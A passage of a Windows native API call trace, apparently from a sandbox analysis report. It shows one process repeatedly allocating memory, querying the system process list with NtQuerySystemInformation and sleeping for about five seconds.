(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.238] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0179.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0179.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.498] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0179.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0179.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.710] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0179.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0179.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0179.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0179.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0179.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0180.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.340] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0180.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0180.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.544] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0180.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0180.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.886] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0180.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0180.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0180.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0180.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0180.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0181.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.452] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0181.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0181.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0181.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0181.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0181.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0181.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.721] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0181.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0181.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0181.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0181.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0181.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0182.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.002] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0182.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0182.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.170] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0182.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0182.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.388] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0182.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0182.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.601] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0182.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0182.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0182.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0182.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0182.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0183.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.093] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0183.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0183.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.293] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0183.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0183.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.651] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0183.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0183.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0183.878] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0183.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0183.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0183.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0183.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0183.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0184.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.168] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0184.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0184.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.515] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0184.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0184.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0184.746] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0184.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0184.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0184.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0184.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0184.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0185.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.011] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0185.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0185.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.367] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0185.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.443] NtAllocateVirtualMemory (in: 